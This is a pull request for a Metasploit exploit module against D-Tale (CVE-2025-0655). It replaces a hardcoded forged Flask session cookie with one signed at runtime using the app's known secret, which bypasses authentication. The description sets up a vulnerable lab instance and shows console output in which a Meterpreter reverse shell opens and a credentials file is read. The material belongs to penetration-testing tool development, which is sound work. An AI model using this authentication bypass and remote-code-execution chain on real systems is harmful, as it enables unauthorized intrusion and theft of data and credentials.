### PR TITLE
Update dtale_rce_cve_2025_0655.rb to use dynamically generated session

### DIFF
--- a/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
+++ b/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
@@ -9,14 +9,6 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
 
-  # forge a cookie in case there was authentication enabled:
-  # import hashlib
-  # from itsdangerous import URLSafeTimedSerializer # pip install itsdangerous
-  # signer_kwargs = { "key_derivation" : "hmac", "digest_method" : staticmethod(hashlib.sha1) }
-  # ser = URLSafeTimedSerializer("Dtale", salt="cookie-session", signer_kwargs=signer_kwargs)
-  # session = ser.dumps({"logged_in" : True, "username" : "whatever"})
-  SESSION = 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoid2hhdGV2ZXIifQ.Z8Jdmw.zUb6b2uEm9ZDKWIOsw2A1xLIuLc'
-
   def initialize(info = {})
     super(
       update_info(
@@ -36,6 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2024-3408'],
           ['CVE', '2025-0655'],
+          ['URL', 'https://huntr.com/bounties/57a06666-ff85-4577-af19-f3dfb7b02f91'],
           ['URL', 'https://huntr.com/bounties/f63af7bd-5438-4b36-a39b-4c90466cff13'],
         ],
         'Platform' => %w[linux],
@@ -72,12 +65,20 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  def generate_session
+    @session = Msf::Exploit::Remote::HTTP::FlaskUnsign::Session.sign({ 'logged_in' => true, 'username' => rand_text_alpha(8) }, 'Dtale')
+    # Need wait, otherwise auth bypass fails
+    sleep 2
+  end
+
   def check
+    generate_session
+
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'dtale/popup/upload'),
       'headers' => {
-        'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
+        'Cookie' => "session=#{@session}" # Set the JWT token as a cookie
       }
     })
     return Exploit::CheckCode::Unknown unless res&.code == 200
@@ -95,6 +96,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    generate_session unless @session
+
     # Create a new MIME message (multipart form data)
     mime = Rex::MIME::Message.new
     # Add the file part to the body
@@ -116,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => "multipart/form-data; boundary=#{mime.bound}",
       'data' => mime.to_s,
       'headers' => {
-        'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
+        'Cookie' => "session=#{@session}" # Set the JWT token as a cookie
       }
     })
     @data_id = res&.get_json_document&.fetch('data_id', nil)
@@ -130,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'settings' => { 'enable_custom_filters' => true }.to_json
       },
       'headers' => {
-        'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
+        'Cookie' => "session=#{@session}" # Set the JWT token as a cookie
       }
     })
     fail_with(Failure::Unknown, 'Failed to update the settings.') unless res&.get_json_document&.fetch('success', nil)
@@ -144,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'save' => true
       },
       'headers' => {
-        'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
+        'Cookie' => "session=#{@session}" # Set the JWT token as a cookie
       }
     })
     print_status('Successfully executed the payload.')
@@ -161,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'dataIds' => @data_id
         },
         'headers' => {
-          'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
+          'Cookie' => "session=#{@session}" # Set the JWT token as a cookie
         }
       })
       print_status("Failed to clean up data_id: #{@data_id}") unless res&.get_json_document&.fetch('success', nil)

--- a/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
+++ b/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def generate_session
+  def generate_dtale_jwt
     @session = Msf::Exploit::Remote::HTTP::FlaskUnsign::Session.sign({ 'logged_in' => true, 'username' => rand_text_alpha(8) }, 'Dtale')
     # Need wait, otherwise auth bypass fails
     sleep 2

--- a/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
+++ b/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    generate_session
+    generate_dtale_jwt
 
     res = send_request_cgi({
       'method' => 'GET',
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    generate_session unless @session
+    generate_dtale_jwt unless @session
 
     # Create a new MIME message (multipart form data)
     mime = Rex::MIME::Message.new


### PR DESCRIPTION
Address this comment: https://github.com/rapid7/metasploit-framework/pull/19899#discussion_r1978033407

cc @terrorbyte 


## Before
The current fixed session will expire in the future and authentication bypass for versions prior to 3.13.0 will fail.


## After
The session will be generated dynamically using FlaskUnsign calls and will never expire.


## Installation
1. `python3 -m venv dtaleenv`
2. `source dtaleenv/bin/activate`
3. `pip install 'dtale==3.12.0'`
4. Edit `~/.config/dtale.ini` to enable authentication

```
[auth]
active = True
username = foo
password = bar
```

5. `dtale --host 0.0.0.0`


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/dtale_rce_cve_2025_0655`
4. Do: `run lhost=<lhost> rhost=<rhost>`
5. You should get a meterpreter


## Scenarios
![image](https://github.com/user-attachments/assets/9a001c39-d7c0-45ca-95c3-9d4d27be20df)
```
msf6 > use exploit/linux/http/dtale_rce_cve_2025_0655
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > run lhost=192.168.56.1 rhost=192.168.56.17
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.12.0 detected.
[*] Use data_id: 1
[*] Updated the enable_custom_filters to true.
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:41144) at 2025-03-06 08:36:51 +0900
[*] Successfully executed the payload.
[*] Successfully cleaned up data_id: 1

meterpreter > getuid
Server username: ubu
meterpreter > sysinfo
Computer     : 192.168.56.17
OS           : Ubuntu 22.04 (Linux 6.8.0-52-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > cat ~/.config/dtale.ini
[auth]
active = True
username = foo
password = bar
meterpreter > 
```